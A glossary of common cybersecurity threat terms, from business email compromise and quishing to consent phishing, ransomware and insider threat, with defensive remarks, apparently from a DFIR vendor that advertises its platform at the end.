Business email compromise (BEC): A social engineering attack where adversaries hijack or spoof corporate email accounts to defraud organizations, redirect payments, or exfiltrate sensitive data. BEC usually involves no malware; it relies on lookalike domains or compromised mailboxes, carefully timed invoice or payroll requests, and mailbox rules that hide the victim's replies.
Quishing (QR code phishing): A phishing technique that embeds malicious URLs inside QR codes to bypass text-based email security filters and move the click to a personal mobile device that sits outside corporate web filtering and endpoint controls.
Thread hijacking: An attack where an adversary compromises a mailbox and replies to existing email threads, inheriting their context and trust, to appear legitimate to recipients. It is often the first visible sign that the sending mailbox was compromised earlier.
Spear phishing: A targeted phishing attack directed at specific individuals or organizations, using personalized information gathered from public sources or prior compromises to increase credibility and bypass skepticism.
Credential harvesting: The theft of usernames and passwords through fake login pages, keyloggers, or other deceptive methods designed to capture authentication credentials. Adversary-in-the-middle phishing kits that proxy the real login page also capture session cookies, defeating MFA methods that are not bound to the origin.
Typosquatting: Registering domain names that are deliberate misspellings or minor variations of legitimate domains (omitted, doubled, swapped, or adjacent-key characters, alternate TLDs, added hyphens) to deceive users navigating to trusted sites or to receive mistyped email. Generating the permutations of your own domains and watching registrations and certificate issuance for them is the proactive counterpart.
Consent phishing: An attack that tricks users into granting a malicious application OAuth consent, giving attackers persistent account access without requiring the user's password. The resulting tokens survive a password reset and MFA, so remediation must revoke the application's grants and refresh tokens, not just reset credentials.
Social engineering: Psychological manipulation techniques used to deceive people into divulging confidential information, granting access, or performing actions that compromise security.
Ransomware: Malware that encrypts files or locks systems and demands payment for restoration, often combined with data exfiltration as a double extortion tactic so that backups alone do not remove the leverage.
Supply chain attack: An attack that compromises a trusted third-party vendor, software provider, build system, or service to gain indirect access to the ultimate target, often reaching many victims through one compromised update or dependency.
Watering hole attack: An attack strategy where an adversary compromises a website frequently visited by a specific target group to silently infect visitors with malware.
Brute force attack: An attack method that systematically tries many passwords or cryptographic keys until the correct value is found. Password spraying (a few common passwords across many accounts, to stay under lockout thresholds) and credential stuffing (replaying credentials leaked from other breaches) are the online variants most often seen against identity providers.
Insider threat: A security risk originating from within the organization, that is, employees, contractors, or partners who misuse their authorized access, deliberately or through negligence, to cause harm.
DFIR Platform provides API-first tools for phishing analysis, exposure scanning, IOC enrichment, and AI-powered triage. Free tier included.